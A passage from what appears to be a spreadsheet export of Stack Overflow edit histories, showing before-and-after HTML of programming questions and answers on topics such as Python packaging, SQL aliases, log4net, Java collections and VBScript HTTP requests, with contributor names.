 &lt;p&gt;&lt;a href="http://www.gtk.org/" rel="nofollow noreferrer"&gt;GTK&lt;/a&gt; and &lt;a href="http://www.trolltech.com" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;QT&lt;/span&gt;&lt;/a&gt; are prettier and more powerful but they have a one big disadvantage for you: they are heavy and deppend upon third libraries, especially GTK which has a lot of dependencies that makes it a little hard to distribute it embeded in your software.&lt;/p&gt; _x000D_
 &lt;p&gt; As for the binary creation I know there is py2exe which converts python code to win32 executable code (.exe's) but im not sure if there is something similar for OSX. Are you worried because people could see the source code or just so you can bundle all in a single package? If you just want to bundle everything you dont need to create a standalone executable, you could easily create an installer:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://docs.python.org/dist/built-dist.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Creating distributable in python&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; That's a guide on how to distribute your software when it's done.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Gustavo Rubio</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Wikipedia is pretty clear on this.&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; In computer science, marshalling (similar to serialization) is the process of transforming the memory representation of an object to a data format suitable for storage or transmission. It is typically used when data must be moved between different parts of a computer program or from one program to another.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Marshalling_(computer_science)" rel="nofollow noreferrer"&gt;http://en.wikipedia.org/wiki/Marshalling_(computer_science)&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I beg to differ,&lt;/span&gt; Wikipedia is pretty clear on this.&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; In computer science, marshalling (similar to serialization) is the process of transforming the memory representation of an object to a data format suitable for storage or transmission. It is typically used when data must be moved between different parts of a computer program or from one program to another.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Marshalling_(computer_science)" rel="nofollow noreferrer"&gt;http://en.wikipedia.org/wiki/Marshalling_(computer_science)&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Constantin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You're looking for the &lt;code&gt;sealed&lt;/code&gt; keyword. It does exactly what the &lt;span class="diff-delete"&gt;final&lt;/span&gt; keyword in Java does. Attempts to inherit will result in a compilation error.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You're looking for the &lt;code&gt;sealed&lt;/code&gt; keyword. It does exactly what the &lt;code&gt;&lt;span class="diff-add"&gt;final&lt;/span&gt;&lt;/code&gt; keyword in Java does. Attempts to inherit will result in a compilation error.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Kilhoffer</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; On Linux, this will work:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  find . -iname ".svn" -&lt;span class="diff-delete"&gt;type d -&lt;/span&gt;print0 | xargs -0 rm -r_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; On Linux, this will work:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  find . -iname ".svn" -print0 | xargs -0 rm -r_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>T.Rob</t>
  </si>
  <si>
    <t>Bascht</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I like this naming style:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;OrdersShouldBeCreated&lt;/span&gt;();_x000D_
&lt;span class="diff-delete"&gt;OrdersWithNoProductsShouldFail&lt;/span&gt;();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;and so on. It&lt;/span&gt; makes really clear&lt;span class="diff-delete"&gt; to a non-tester&lt;/span&gt; what &lt;span class="diff-delete"&gt;the problem is&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I like this naming style:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;ordersShouldBeCreated&lt;/span&gt;();_x000D_
&lt;span class="diff-add"&gt;ordersWithNoProductsShouldFail&lt;/span&gt;();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;It&lt;/span&gt; makes really clear what &lt;span class="diff-add"&gt;we are expecting to happen&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>masoud</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A function is a piece of code that is called by name. It can be passed data to operate on (ie. the parameters) and can optionally return data (the return value).&lt;/p&gt; _x000D_
 &lt;p&gt; All data that is passed to a function is explicitly passed.&lt;/p&gt; _x000D_
 &lt;p&gt; A method is a piece of code that is called by name that is associated with an object. In most respects it is identical to a function except for two key differences.&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; It is implicitly passed the object for which it was called&lt;/li&gt; _x000D_
  &lt;li&gt; It is able to operate on data that is contained within the class (remembering that an object is an instance of a class - the class is the definition, the object is an instance of that data)&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A function is a piece of code that is called by name. It can be passed data to operate on (ie. the parameters) and can optionally return data (the return value).&lt;/p&gt; _x000D_
 &lt;p&gt; All data that is passed to a function is explicitly passed.&lt;/p&gt; _x000D_
 &lt;p&gt; A method is a piece of code that is called by name that is associated with an object. In most respects it is identical to a function except for two key differences.&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; It is implicitly passed the object for which it was called&lt;/li&gt; _x000D_
  &lt;li&gt; It is able to operate on data that is contained within the class (remembering that an object is an instance of a class - the class is the definition, the object is an instance of that data)&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;(this is a simplified explanation, ignoring issues of scope etc.)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew Edgecombe</t>
  </si>
  <si>
    <t>Fakhr Alam</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you're Googling for a decent JavaScript reference on a given topic, include the "mdc" keyword in your query and your first results will be from the Mozilla Developer Center. I don't carry any offline references or books with me. I always use the "mdc" keyword trick to directly get to what I'm looking for. For example:&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you're Googling for a decent JavaScript reference on a given topic, include the "mdc" keyword in your query and your first results will be from the Mozilla Developer Center. I don't carry any offline references or books with me. I always use the "mdc" keyword trick to directly get to what I'm looking for. For example:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Google: &lt;/span&gt;&lt;a href="http://www.letmegooglethatforyou.com/?q=javascript+array+sort+mdc&amp;amp;l=1" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;javascript array sort mdc&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; (in most cases you may omit "javascript")&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ates Goral</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have wrapped Log4net in a static wrapper and want to log&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;loggingEvent.LocationInformation.MethodName_x000D_
loggingEvent.LocationInformation.ClassName_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; However all i get is the name of my wrapper.&lt;/p&gt; _x000D_
 &lt;p&gt; How can i Log that info using a forwardingappender and a static wrapper class like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Logger.Debug("Logging to Debug");_x000D_
Logger.Info("Logging to Info");_x000D_
Logger.Warn("Logging to Warn");_x000D_
Logger.Error(ex);_x000D_
Logger.Fatal(ex);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; My logger looks like this&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;    private readonly static Type ThisDeclaringType = typeof(Logger);_x000D_
    private static readonly ILogger defaultLogger;_x000D_
_x000D_
    static Logger()_x000D_
    {_x000D_
      defaultLogger =_x000D_
        LoggerManager.GetLogger(Assembly.GetCallingAssembly(),"MyDefaultLoggger");_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;    public static void Info(string message)_x000D_
    {_x000D_
        if (defaultLogger.IsEnabledFor(infoLevel))_x000D_
        {_x000D_
            defaultLogger.Log(ThisDeclaringType, infoLevel, message, null);_x000D_
        }_x000D_
    }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have wrapped Log4net in a static wrapper and want to log&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;loggingEvent.LocationInformation.MethodName_x000D_
loggingEvent.LocationInformation.ClassName_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; However all i get is the name of my wrapper.&lt;/p&gt; _x000D_
 &lt;p&gt; How can i Log that info using a forwardingappender and a static wrapper class like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Logger.Debug("Logging to Debug");_x000D_
Logger.Info("Logging to Info");_x000D_
Logger.Warn("Logging to Warn");_x000D_
Logger.Error(ex);_x000D_
Logger.Fatal(ex);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Claus Thomsen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Similar to a combination of jamesh's answers, we do this for web apps&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Supply a "report a bug" link so that users can report bugs even when they don't generate error screens.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
   &lt;ul&gt; _x000D_
    &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
    &lt;li&gt;&lt;span class="diff-delete"&gt; That link opens up a small dialog which in turn submits via Ajax to a processor on the server.&lt;/span&gt;&lt;/li&gt; _x000D_
    &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
   &lt;/ul&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; The processor associates the submission to the script being reported on and its PID, so that we can find the right log files (we organize ours by script/pid), and then sends e-mail to our bug tracking system.That&lt;/span&gt; link opens up a small dialog which in turn submits via Ajax to a processor on the server.&lt;/li&gt; _x000D_
  &lt;li&gt; The processor associates the submission to the script being reported on and its PID, so that we can find the right log files (we organize ours by script/pid), and then sends e-mail to our bug tracking system.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Similar to a combination of jamesh's answers, we do this for web apps&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Supply a "report a bug" link so that users can report bugs even when they don't generate error screens.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; That&lt;/span&gt; link opens up a small dialog which in turn submits via Ajax to a processor on the server.&lt;/li&gt; _x000D_
  &lt;li&gt; The processor associates the submission to the script being reported on and its PID, so that we can find the right log files (we organize ours by script/pid), and then sends e-mail to our bug tracking system.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Adam Bellaire</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;
            &lt;p&gt;I happened to debate with a friend during college days whether advanced mathematics is necessary for any veteran programmer. He used to argue fiercely against that. He said that programmers need only basic mathematical knowledge from high school or fresh year college math, no more no less, and that almost all of programming tasks can be achieved without even need for advanced math. He argued, however, that algorithms are fundamental &amp;amp; must-have asset for programmers.&lt;/p&gt;
&lt;p&gt;My stance was that all computer science advances depended almost solely on mathematics advances, and therefore a thorough knowledge in mathematics would help programmers greatly when they're working with real-world challenging problems.&lt;/p&gt;
&lt;p&gt;I still cannot settle on which side of the arguments is correct. Could you tell us your stance, from your own experience?&lt;/p&gt;
        &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;XmlTextWriter.WriteString()&lt;/code&gt; does the escaping.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;using(var s = new StringWriter()) {_x000D_
    using(var w = new XmlTextWriter(s)) {_x000D_
        w.WriteString(text);_x000D_
    }_x000D_
    var escaped = s.ToString();_x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;XmlTextWriter.WriteString()&lt;/code&gt; does the escaping.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>GSerg</t>
  </si>
  <si>
    <t>drzaus</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This is sort of SQL newbie question, I think, but here goes.&lt;/p&gt; _x000D_
 &lt;p&gt; I have a SQL Query (SQL Server 2005) that I've put together &lt;span class="diff-delete"&gt;base&lt;/span&gt; on an example user-defined function:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT _x000D_
    CASEID,_x000D_
    GetNoteText(CASEID)_x000D_
FROM _x000D_
( _x000D_
    SELECT _x000D_
        CASEID _x000D_
    FROM _x000D_
        ATTACHMENTS _x000D_
    GROUP BY _x000D_
        CASEID _x000D_
) i_x000D_
GO _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; the UDF works great (it concatenates data from multiple rows in a related table, if that matters at all) but I'm confused about the "i" after the FROM clause. The query works fine with the i but fails without it. What is the significance of the "i"?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This is sort of SQL newbie question, I think, but here goes.&lt;/p&gt; _x000D_
 &lt;p&gt; I have a SQL Query (SQL Server 2005) that I've put together &lt;span class="diff-add"&gt;based&lt;/span&gt; on an example user-defined function:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT _x000D_
    CASEID,_x000D_
    GetNoteText(CASEID)_x000D_
FROM _x000D_
( _x000D_
    SELECT _x000D_
        CASEID _x000D_
    FROM _x000D_
        ATTACHMENTS _x000D_
    GROUP BY _x000D_
        CASEID _x000D_
) i_x000D_
GO _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; the UDF works great (it concatenates data from multiple rows in a related table, if that matters at all) but I'm confused about the "i" after the FROM clause. The query works fine with the i but fails without it. What is the significance of the "i"?&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT: As Joel noted below, it's not a keyword&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>cori</t>
  </si>
  <si>
    <t>Dana</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; For object types (eg. &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Element[] arr&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;// This will work for Object arrays, but will NOT work for primitive type array_x000D_
&lt;/span&gt;new ArrayList&amp;lt;&amp;gt;(Arrays.asList(array))&lt;span class="diff-delete"&gt;;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; For primitive type arrays (eg. &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;int[] arr&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;):&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;int[] arr = new int[] {1,2,3,4,5};_x000D_
List&amp;lt;Integer&amp;gt; myList = new ArrayList&amp;lt;&amp;gt;(arr.length);_x000D_
for (int i = 0; i &amp;lt; arr.length; i++) {_x000D_
    myList.add(arr[i]);_x000D_
}&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;new ArrayList&amp;lt;&amp;gt;(Arrays.asList(array))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tom</t>
  </si>
  <si>
    <t>Basil Musa</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Ive never had that, how ecactly are you echoing the link? All the following should work.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;echo '&amp;lt;a href="http://someothersite.com"&amp;gt;Link&amp;lt;/a&amp;gt;';_x000D_
echo '&amp;lt;a href="anotherpage.php"&amp;gt;Some page&amp;lt;/a&amp;gt;';_x000D_
echo '&amp;lt;a href="../pageinparentdir.php"&amp;gt;Another page&amp;lt;/a&amp;gt;';_x000D_
etc_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; edit, since you added the info.&lt;/p&gt; _x000D_
 &lt;p&gt; You can't just have http:// as href, even entering that link directly into a html page has that effect.&lt;br&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; eg:&lt;br&gt; html:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt; &amp;lt;a href="http://" title="bla"&amp;gt;huzzah&amp;lt;/a&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; link (in FF3):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;http:///_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Ive never had that, how ecactly are you echoing the link? All the following should work.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;echo '&amp;lt;a href="http://someothersite.com"&amp;gt;Link&amp;lt;/a&amp;gt;';_x000D_
echo '&amp;lt;a href="anotherpage.php"&amp;gt;Some page&amp;lt;/a&amp;gt;';_x000D_
echo '&amp;lt;a href="../pageinparentdir.php"&amp;gt;Another page&amp;lt;/a&amp;gt;';_x000D_
etc_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; edit, since you added the info.&lt;/p&gt; _x000D_
 &lt;p&gt; You can't just have http:// as href, even entering that link directly into a html page has that effect. eg:&lt;br&gt; html:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt; &amp;lt;a href="http://" title="bla"&amp;gt;huzzah&amp;lt;/a&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; link (in FF3):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;http:///_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Fire Lancer</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")_x000D_
URL = "http://www.somedomain.com"_x000D_
objHTTP.Open "POST", URL, False_x000D_
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"_x000D_
objHTTP.send ""_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Alternatively, for greater control over the HTTP request you can use &lt;a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa384106%28v=vs.85%29.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;WinHttp.WinHttpRequest.5.1&lt;/code&gt;&lt;/a&gt; in place of &lt;a href="https://msdn.microsoft.com/en-us/library/ms762278%28v=vs.85%29.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;MSXML2.ServerXMLHTTP&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;URL = "http://www.somedomain.com"_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;objHTTP.Open "POST", URL, False_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;objHTTP.send &lt;span class="diff-add"&gt;(&lt;/span&gt;""&lt;span class="diff-add"&gt;)&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Alternatively, for greater control over the HTTP request you can use &lt;a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa384106%28v=vs.85%29.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;WinHttp.WinHttpRequest.5.1&lt;/code&gt;&lt;/a&gt; in place of &lt;a href="https://msdn.microsoft.com/en-us/library/ms762278%28v=vs.85%29.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;MSXML2.ServerXMLHTTP&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt;&amp;nbsp; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Leviathan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In this case, "alternate" just means "previous". So, yes, :b2 (or 2 ctrl-6) is probably the easiest way to change which two buffers will be toggled by ctrl-6.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, take a look at the :keepalt command.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Rats, :keepalt is &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;exactly&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; what I'm after. But it's only available in vim 7.0 or later and we only have vim 6.0 deployed atm. )-: Thanks for the tip at least I can use it on my box at home.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In this case, "alternate" just means "previous". So, yes, :b2 (or 2 ctrl-6) is probably the easiest way to change which two buffers will be toggled by ctrl-6.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, take a look at the :keepalt command.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>graywh</t>
  </si>
  <si>
    <t>Rob Wells</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'll be performing calculations on lat / long pairs,&lt;br&gt;&lt;span class="diff-delete"&gt; what&lt;/span&gt; datatype is best suited &lt;span class="diff-delete"&gt;in&lt;/span&gt; MySQL database?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Bearing in mind that&lt;/span&gt; I'll be performing calculations on lat / long pairs,&lt;span class="diff-add"&gt; what&lt;/span&gt; datatype is best suited &lt;span class="diff-add"&gt;for use with a&lt;/span&gt; MySQL database?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Codebeef</t>
  </si>
  <si>
    <t>ajreal</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've used recursion quite a lot &lt;span class="diff-delete"&gt;during&lt;/span&gt; my many years of programming to solve simple problems, but I'm fully aware that sometimes you need iteration due to memory/speed problems.&lt;/p&gt; _x000D_
 &lt;p&gt; So, &lt;span class="diff-delete"&gt;somewhere&lt;/span&gt; in the very far past I went to try &lt;span class="diff-delete"&gt;to&lt;/span&gt; find if there existed any "pattern" or way of transforming a common recursion approach to iteration and found nothing. Or at least nothing that I remember would help.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Are there&lt;span class="diff-delete"&gt; any&lt;/span&gt; general rules?&lt;/li&gt; _x000D_
  &lt;li&gt; Is there a "pattern"?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've used recursion quite a lot &lt;span class="diff-add"&gt;on&lt;/span&gt; my many years of programming to solve simple problems, but I'm fully aware that sometimes you need iteration due to memory/speed problems.&lt;/p&gt; _x000D_
 &lt;p&gt; So, &lt;span class="diff-add"&gt;sometime&lt;/span&gt; in the very far past I went to try &lt;span class="diff-add"&gt;and&lt;/span&gt; find if there existed any "pattern" or&lt;span class="diff-add"&gt; text-book&lt;/span&gt; way of transforming a common recursion approach to iteration and found nothing. Or at least nothing that I&lt;span class="diff-add"&gt; can&lt;/span&gt; remember&lt;span class="diff-add"&gt; it&lt;/span&gt; would help.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Are there general rules?&lt;/li&gt; _x000D_
  &lt;li&gt; Is there a "pattern"?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Gustavo Carreno</t>
  </si>
  <si>
    <t>tak971</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.gotw.ca/gotw/057.htm" rel="nofollow noreferrer"&gt;GotW #57&lt;/a&gt; says to use a proxy class with an implicit conversion for this very purpose.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;struct StateMethod;_x000D_
typedef StateMethod (*FuncPtr)();_x000D_
struct StateMethod_x000D_
{_x000D_
  StateMethod( FuncPtr pp ) : p( pp ) { }_x000D_
  operator FuncPtr() { return p; }_x000D_
  FuncPtr p;_x000D_
};_x000D_
_x000D_
int main()_x000D_
{_x000D_
